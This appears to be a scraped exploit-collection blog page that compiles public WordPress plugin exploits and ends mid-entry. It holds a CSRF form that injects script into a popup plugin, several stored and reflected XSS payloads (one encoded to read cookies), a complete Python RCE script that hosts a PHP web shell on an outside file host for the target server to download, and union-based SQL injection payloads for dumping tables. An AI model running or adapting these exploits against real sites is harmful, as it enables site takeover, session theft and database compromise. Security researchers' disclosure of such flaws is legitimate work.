<!--
Source: https://sumofpwn.nl/advisory/2016/popup_by_supsystic_wordpress_plugin_vulnerable_to_cross_site_request_forgery.html
Abstract
A Cross-site Request Forgery vulnerablity exists in the Popup by Supsystic WordPress Plugin. This vulnerablity allows attackers to add and modify scripting code that will target authenticated WordPress admins or visitors that see the popup generated by this plugin. Before exploitation of this issue succeeds, and scripting code is therefore injected, a victim WordPress admin to click a specially crafted link or visit a malicious attacker-controlled webpage.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160724-0013
Tested versions
This issue was succesfully tested on the Popup by Supsystic WordPress plugin version 1.7.6.
Fix
There is currently no fix available.
Introduction
The aim of the Popup by Supsystic WordPress plugin is to help you get more newsletter subscribers, promote new products, deliver special offers and to get more social followers.
A Cross-site Request Forgery vulnerablity exists in the Popup by Supsystic WordPress Plugin. This vulnerablity allows attackers to add and modify scripting code that will target authenticated admins or visitors that see the popup generated by this plugin. In order to exploit this issue the target user must click a specially crafted link or visit a malicious website (or advertisement).
Details
This issue exists because Popup by Supsystic lacks protection against Cross-Site Request Forgery attacks. The following proof of concept code demonstrates this issue:
-->
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="params[main][show_on]" value="page_load" />
<input type="hidden" name="params[main][show_on_page_load_delay]" value="" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-show-popup id=100]" />
<input type="hidden" name="ppsCopyTextCode" value="onclick="ppsShowPopup(100); return false;"" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_click_on_el_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_perc_scroll]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_link_follow_delay]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-popup-content id=100]" />
<input type="hidden" name="params[main][close_on]" value="user_close" />
<input type="hidden" name="params[main][show_pages]" value="all" />
<input type="hidden" name="params[main][show_time_from]" value="12:00am" />
<input type="hidden" name="params[main][show_time_to]" value="12:00am" />
<input type="hidden" name="params[main][show_date_from]" value="" />
<input type="hidden" name="params[main][show_date_to]" value="" />
<input type="hidden" name="params[main][show_to]" value="everyone" />
<input type="hidden" name="params[main][show_to_first_time_visit_days]" value="30" />
<input type="hidden" name="params[main][show_to_until_make_action_days]" value="30" />
<input type="hidden" name="params[main][count_times_num]" value="1" />
<input type="hidden" name="params[main][count_times_mes]" value="day" />
<input type="hidden" name="params[main][hide_for_devices_show]" value="0" />
<input type="hidden" name="params[main][hide_for_post_types_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips]" value="" />
<input type="hidden" name="params[main][hide_for_countries_show]" value="0" />
<input type="hidden" name="params[main][hide_for_languages_show]" value="0" />
<input type="hidden" name="params[main][hide_search_engines_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url]" value="" />
<input type="hidden" name="params[main][hide_for_user_roles_show]" value="0" />
<input type="hidden" name="params[tpl][width]" value="400" />
<input type="hidden" name="params[tpl][width_measure]" value="px" />
<input type="hidden" name="params[tpl][bg_overlay_opacity]" value="0.5" />
<input type="hidden" name="params[tpl][bg_type_0]" value="color" />
<input type="hidden" name="params[tpl][bg_img_0]" value="" />
<input type="hidden" name="params[tpl][bg_color_0]" value="#8c7764" />
<input type="hidden" name="params[tpl][bg_type_1]" value="color" />
<input type="hidden" name="params[tpl][bg_img_1]" value="" />
<input type="hidden" name="params[tpl][bg_color_1]" value="#75362c" />
<input type="hidden" name="params[tpl][font_label]" value="default" />
<input type="hidden" name="params[tpl][label_font_color]" value="#ffffff" />
<input type="hidden" name="params[tpl][font_txt_0]" value="default" />
<input type="hidden" name="params[tpl][text_font_color_0]" value="#f9e6ce" />
<input type="hidden" name="params[tpl][font_footer]" value="default" />
<input type="hidden" name="params[tpl][footer_font_color]" value="#585858" />
<input type="hidden" name="params[tpl][responsive_mode]" value="def" />
<input type="hidden" name="params[tpl][reidrect_on_close]" value="" />
<input type="hidden" name="params[tpl][close_btn]" value="while_close" />
<input type="hidden" name="params[tpl][bullets]" value="lists_green" />
<input type="hidden" name="layered_style_promo" value="1" />
<input type="hidden" name="params[tpl][layered_pos]" value="" />
<input type="hidden" name="params[tpl][enb_label]" value="1" />
<input type="hidden" name="params[tpl][label]" value="SIGN UP<br> to our Newsletter!" />
<input type="hidden" name="params[tpl][enb_txt_0]" value="1" />
<input type="hidden" name="params_tpl_txt_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="params[tpl][foot_note]" value="We respect your privacy. Your information will not be shared with any third party and you can unsubscribe at any time " />
<input type="hidden" name="params[tpl][enb_sm_facebook]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_googleplus]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_twitter]" value="1" />
<input type="hidden" name="params[tpl][sm_design]" value="boxy" />
<input type="hidden" name="params[tpl][anim_key]" value="none" />
<input type="hidden" name="params[tpl][anim_duration]" value="" />
<input type="hidden" name="params[tpl][enb_subscribe]" value="1" />
<input type="hidden" name="params[tpl][sub_dest]" value="wordpress" />
<input type="hidden" name="params[tpl][sub_wp_create_user_role]" value="subscriber" />
<input type="hidden" name="params[tpl][sub_aweber_listname]" value="" />
<input type="hidden" name="params[tpl][sub_aweber_adtracking]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_api_key]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_groups_full]" value="" />
<input type="hidden" name="test_email" value="canzihazcandy@gmail.com" />
<input type="hidden" name="params[tpl][sub_fields][name][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][name][name]" value="name" />
<input type="hidden" name="params[tpl][sub_fields][name][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][name][label]" value="Name" />
<input type="hidden" name="params[tpl][sub_fields][name][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][name][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][name][mandatory]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][name]" value="email" />
<input type="hidden" name="params[tpl][sub_fields][email][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][email][label]" value="E-Mail" />
<input type="hidden" name="params[tpl][sub_fields][email][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][email][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][mandatory]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][email][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_txt_confirm_sent]" value="Confirmation link was sent to your email address. Check your email!" />
<input type="hidden" name="params[tpl][sub_txt_success]" value="Thank you for subscribe!" />
<input type="hidden" name="params[tpl][sub_txt_invalid_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_txt_exists_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_redirect_url]" value="" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_subject]" value="Confirm subscription on [sitename]" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_from]" value="admin@mail.com" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_message]" value="You subscribed on site <a href="[siteurl]">[sitename]</a>. Follow <a href="[confirm_link]">this link</a> to complete your subscription. If you did not subscribe here - just ignore this message." />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_subject]" value="[sitename] Your username and password" />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_from]" value="admin@mail.com" />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_message]" value="Username: [user_login]<br />Password: [password]<br />[login_url]" />
<input type="hidden" name="params[tpl][sub_redirect_email_exists]" value="" />
<input type="hidden" name="params[tpl][sub_btn_label]" value="SIGN UP" />
<input type="hidden" name="params[tpl][sub_new_email]" value="admin&@mail.com" />
<input type="hidden" name="params[tpl][sub_new_subject]" value="New Subscriber on Summer of Pwnage" />
<input type="hidden" name="params[tpl][sub_new_message]" value="You have new subscriber on your site <a href="[siteurl]">[sitename]</a>, here us subscriber information:<br />[subscriber_data]" />
<input type="hidden" name="stat_from_txt" value="" />
<input type="hidden" name="stat_to_txt" value="" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="html" value="<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Amatic+SC" /> <script>alert("xss")</script> <div id="ppsPopupShell_[ID]" class="ppsPopupShell ppsPopupListsShell"> <a href="#" class="ppsPopupClose ppsPopupClose_[close_btn]"></a> <div class="ppsInnerTblContent"> <div class="ppsPopupListsInner ppsPopupInner"> [if enb_label] <div class="ppsPopupLabel ppsPopupListsLabel">[label]</div> [endif] <div style="clear: both;"></div> [if enb_txt_0] <div class="ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0"> [txt_0] </div> [endif] [if enb_subscribe] <div class="ppsSubscribeShell"> [sub_form_start] [sub_fields_html] <input type="submit" name="submit" value="[sub_btn_label]" /> [sub_form_end] <div style="clear: both;"></div> </div> [endif] <div style="clear: both;"></div> <div class="ppsRightCol"> [if enb_sm] <div style="clear: both;"></div> <div class="ppsSm"> [sm_html] </div> [endif] [if enb_foot_note] <div class="ppsFootNote"> [foot_note] </div> [endif] </div> </div> </div> </div> " />
<input type="hidden" name="params[opts_attrs][bg_number]" value="2" />
<input type="hidden" name="params[opts_attrs][txt_block_number]" value="1" />
<input type="hidden" name="mod" value="popup" />
<input type="hidden" name="action" value="save" />
<input type="hidden" name="id" value="100" />
<input type="hidden" name="params_tpl_txt_val_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="pl" value="pps" />
<input type="hidden" name="reqType" value="ajax" />
<input type="submit"/>
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863134129
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
# Date: 11/27/2020
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: https://sygnoos.com
# Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/
# Version: <= 3.69.6
# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter
Plugin is vulnerable to stored cross site scripting. There are multiple
parameters vulnerable to cross site scripting.
All versions up to 3.69.6 are vulnerable to stored cross site scripting.
More information about this plugin could be found on the following links:
1. https://wordpress.org/plugins/popup-builder/
2. https://popup-builder.com/
Cross site scripting (XSS) is a common attack vector that injects malicious
code into a vulnerable web application. XSS differs from other web attack
vectors (e.g., SQL injections), in that it does not directly target the
application itself. Instead, the users of the web application are the ones
at risk. A successful cross site scripting attack can have devastating
consequences for an online business’s reputation and its relationship with
its clients. Stored XSS, also known as persistent XSS, is the more damaging
of the two. It occurs when a malicious script is injected directly into a
vulnerable web application.
# How to reproduce #
1. Login as Editor or Administrator: https://website.com/wp-login/
2. Go to the following link:
https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for
PopUp Builder and select or create new PopUp.
2. Click edit
3. Search and find: # Custom JS or CSS
4. On JS -> Opening events section, add two payloads, one for #2 section
and one for #3 section, like in the following example:
#2 Add the code you want to run before the popup opens. This will be the
code that will work in the process of opening the popup. true/false
conditions will not work in this phase.
<textarea class="wp-editor-area editor-content" data-attr-event="WillOpen"
placeholder=" #... type your code" mode="text/javascript"
name="sgpb-WillOpen">"><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
#3 Add the code you want to run after the popup opens. This code will work
when the popup is already open on the page.
<textarea class="wp-editor-area editor-content" data-attr-event="DidOpen"
placeholder=" #... type your code" mode="text/javascript"
name="sgpb-DidOpen">"><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
5. Click Update
6. Go to https://website.com. The XSS alert will pop up.
# All text-areas from JS section are vulnerable to stored cross site
scripting.
Evidence:
1. https://ibb.co/JvBTq0H
2. https://ibb.co/0KP7NFQ
3. https://ibb.co/3cFnVYF
# Exploit Title: Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\popupbuilder"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://popup-builder.com/
# Software Link: https://wordpress.org/plugins/popup-builder/
# Version: 3.49
# Tested on: Kali Linux
# CVE: N/A
# Description
# This vulnerability is in the validation mode and is located in "Add Post" or "Add Page" of wordpress and the vulnerability type is stored ,after install Popup Builder it will make section in Add Post and Add Page . in this section you will choose which popup show it will create option tag with value of title of the popups, now its easy we just break option tag and insert our script tag inside popup title.
1.Go to the 'Add new' section of Popup Builder
2.Select Image type
3.Enter the payload in the "add Title"
4.Click the "Publish" option
5.Go to Add New of Page section or Add New of Post section
6.Your payload will run
# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=popupbuilder&sgpb_type=image&wp-post-new-reload=true
# Parameter & Payoad: post_title="/><script>alert("Unk9vvN")</script>
#
# POC
#
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post.php?post=39&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 2425
Cookie: ......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
_wpnonce=8dde4c5262&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=popupbuilder&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&post_ID=39&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=01&ss=34&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=01&cur_mn=03&original_publish=Update&save=Update&tax_input%5Bpopup-categories%5D%5B%5D=0&newpopup-categories=New+Category+Name&newpopup-categories_parent=-1&_ajax_nonce-add-popup-categories=11ba2a6f5c&sgpb-image-url=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-content%2Fuploads%2F2019%2F09%2Fwp2601087.jpg&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=not_rule&sgpb-type=image&sgpb-is-preview=0&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=select_event&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-custom-class=sgpb-popup-overlay&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120&sgpb-min-height=&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&post_name=scriptalert1script
# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 03/11/2021
# Exploit Author: Luca Schembri
# Vendor Homepage: https://www.essentialplugin.com/
# Software Link: https://wordpress.org/plugins/popup-anything-on-click/
# Version: < 2.0.4
** Summary **
A user with a low privileged user can perform XSS-Stored attacks.
** Plugin description **
Popup Anything is the best popup builder and marketing plugin that
helps you get more email subscribers, increase sales and grow your
business.
Manage powerful modal popup for your WordPress blog or website. You
can add an unlimited popup with your configurations.
** Vulnerable page **
http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit
** PoC **
Go on the "Popup Anything - Settings" tab and select "Simple Link" as
"Link Type". Select "Link Test" and use this payload:
test" onclick="alert(1)
Save the popup and reload the page. Now click on "Link Text" and it
will execute the javascript code
The same attack can be exploited with "Button Text" and "Popup width" fields.
** Remediation **
Upgrade to 2.0.4 version or later
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15/07/2021
# Exploit Author: Simone Cristofaro
# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/
# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip
# Version: 5.3.2 or below
# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27
# CVE: CVE-2021-42362
# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/
# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is
# enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above.
# This script will login with the provided credentials, create a new post and add a custom field with the link to a
# web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to
# provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is
# set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;)
'''
Banner:
'''
banner = """
* Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)
* @Heisenberg
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
import json
import re
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)')
my_parser.add_argument('-t', help='--Target IP', metavar='IP', type=str, required=True, dest="target_ip")
my_parser.add_argument('-p', help='--Target port', type=str, metavar='PORT', default='80', dest="target_port")
my_parser.add_argument('-w', help='--Wordpress path (ie. /wordpress/)',metavar='PATH', type=str, required=True, dest="wp_path")
my_parser.add_argument('-U', help='--Username', metavar='USER', type=str, required=True, dest="username")
my_parser.add_argument('-P', help='--Password', metavar='PASS', type=str, required=True, dest="password")
args = my_parser.parse_args()
target_ip = args.target_ip
target_port = args.target_port
wp_path = args.wp_path
username = args.username
password = args.password
'''
# Hard coded parameters (if you don't like command line execution)
target_ip = "localhost"
target_port = "80"
wp_path = "/wordpress/"
username = "heisenberg"
password = "heisenberg"
'''
shell_name = 'exploit.gif.php'
payload = 'GIF <html> <body> <form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET[\'cmd\'])) { system($_GET[\'cmd\']); } ?> </pre> </body> </html>'
print('')
print('[*] Starting Exploit:')
'''
Upload file
'''
file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)})
resp = json.loads(file_json.text)
if resp['status']:
urlshort = resp['data']['file']['url']['full']
else:
print(f'[-] Error:'+ resp['error']['message'])
exit()
file_uploaded_site = requests.get(urlshort).text
PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name
print(f'[+] Web Shell successfully uploadad at [{PHP_URL}].')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Monies Browser 1.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
print(f'[+] Authentication successfull as user [{username}] !')
else:
print('[-] Authentication failed ! Check username and password')
exit()
'''
Verify that the requirements are installed
'''
settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug'
settings_page = session.get(settings_page_url).text
search_string = ' gd'
if settings_page.find(search_string) == -1 :
print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\'t generate thumbnails.')
exit()
'''
Get the wpp-admin-token
'''
settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools'
settings_page = session.get(settings_page_url).text
search_string = '<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="'
search_string_end = '" />'
settings_page = settings_page[settings_page.find(search_string):]
wpp_admin_token = settings_page[72: settings_page.find(search_string_end)]
if wpp_admin_token:
print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].')
else:
print('[-] Error while gathering wpp-admin-token !')
exit()
'''
Apply changes to the Popular Posts plugin
'''
body = {
'upload_thumb_src': '',
'thumb_source': 'custom_field',
'thumb_lazy_load': 1,
'thumb_field': 'wpp_thumbnail',
'thumb_field_resize': 1,
'section': 'thumb',
'wpp-admin-token': wpp_admin_token
}
applied_changes = session.post(settings_page_url, headers=header, data=body).text
if applied_changes.find('<div class="notice notice-success is-dismissible"><p><strong>Settings saved.'):
print(f'[+] Settings applied successfully to the Popular Posts plugin. ')
else:
print('[-] Error while applying settings o the Popular Posts plugin!')
exit()
'''
Empty image cache
'''
body = {
'action': 'wpp_clear_thumbnail',
'wpp-admin-token': wpp_admin_token
}
applied_changes = session.post(settings_page_url, headers=header, data=body).text
print(f'[+] Images cache cleared. ')
'''
Get the new post ID and Nonce
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php'
new_post_page = session.get(new_post_url).text
search_string = 'name="_ajax_nonce-add-meta" value="'
search_string_end = '" />'
new_post_page = new_post_page[new_post_page.find(search_string)+35:]
ajax_nonce = new_post_page[:new_post_page.find(search_string_end)]
search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "'
search_string_end = '" );'
new_post_page = new_post_page[new_post_page.find(search_string)+66:]
wp_nonce = new_post_page[:new_post_page.find(search_string_end)]
search_string = '},"post":{"id":'
search_string_end = ','
new_post_page = new_post_page[new_post_page.find(search_string)+15:]
post_ID = new_post_page[:new_post_page.find(search_string_end)]
if post_ID and wp_nonce and ajax_nonce:
print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].')
else:
if not post_ID: print('[-] Error while gathering post_ID !')
elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !')
elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !')
exit()
'''
Publish a new post
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user'
data = {"id":post_ID,"title":"I'm the one who knocks","content":"<!-- wp:paragraph -->\n<p>upgrade your plugins</p>\n<!-- /wp:paragraph -->","status":"publish"}
header['X-WP-Nonce'] = wp_nonce
header['Content-Type'] = 'application/json'
header['X-HTTP-Method-Override'] = 'PUT'
new_post_page = session.post(new_post_url, headers=header, json=data).text
if new_post_page.find('"status":"publish"'):
print(f'[+] New post named [I\'m the one who knocks] published correctly!')
else:
print('[-] Error while publishing the new post !')
exit()
'''
Add the Custom Filed
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
header.pop('X-WP-Nonce')
header['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
header.pop('X-HTTP-Method-Override')
header['Accept']='*/*'
header['X-Requested-With'] = 'XMLHttpRequest'
body = {
'_ajax_nonce': 0,
'action': 'add-meta',
'metakeyselect': 'wpp_thumbnail',
'metakeyinput': "",
'metavalue' : PHP_URL,
'_ajax_nonce-add-meta': ajax_nonce,
'post_id' : post_ID
}
new_post_page = session.post(new_post_url, headers=header, data=body).text
if new_post_page.find("<tr id='meta-") > 0:
print(f'[+] Added a new Custom Field with the uploaded web shell.')
else:
print('[-] Error while adding the custom field !')
print(new_post_page)
exit()
'''
Give it some views to pop it up in the recent posts
'''
print(f'[+] Giving the new post some views (10) [ ', end="")
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php?page_id=' + post_ID
redirect_url = session.get(new_post_url).url
new_post_plugin_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wordpress-popular-posts/v1/popular-posts'
data = {
'_wpnonce': wp_nonce,
'wpp_id': post_ID,
'sampling': 0,
'sampling_rate': 100
}
for progress in range(10):
session.get(redirect_url)
res = session.post(new_post_plugin_url, headers=header, data=data)
print ('=', end='')
print(' ] '+json.loads(res.text)['results'])
print('[+] Exploit done !')
print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name)
print('')
Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability
Author : WICS
Date : 7/12/2015
Software Link : https://wordpress.org/plugins/polls-widget/
Affected Version: 1.0.7 and below
Overview:
Poll widget is wordpress plugin which provide fancy user Polling layout to website users and user can vote according to options provided in specific poll.
This plugin has 2000+ active installations.
Vulnerability exist in front_end.php file in which code is not filtering user supplied data on parameter question_id
line no. 36 $question_id=$_POST['question_id'];
....
....
line no. 94--> $answer=$wpdb->get_results('SELECT `answer_name`,`vote` FROM '.$wpdb->prefix.'polls WHERE question_id='.$question_id,ARRAY_A);
print_r(json_encode($answer, JSON_FORCE_OBJECT));
this script is vulnerable to union based sql injection with column count 2
POC
http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues
in post data, add this
question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5
<b>Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability</b>
<br>
Vulnerable version:<=1.2.4
<br>Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip
////////////////////////
<br>/// Overview:
<br>////////////////////////
<br>
<br>WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file.
////////////////
<br>
/// POC ////
<br>
///////////////
<br>
SQL Injection payload to enumerate tables
<br>----------------------------------------------
<br>http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues
<br><b>Post data</b>
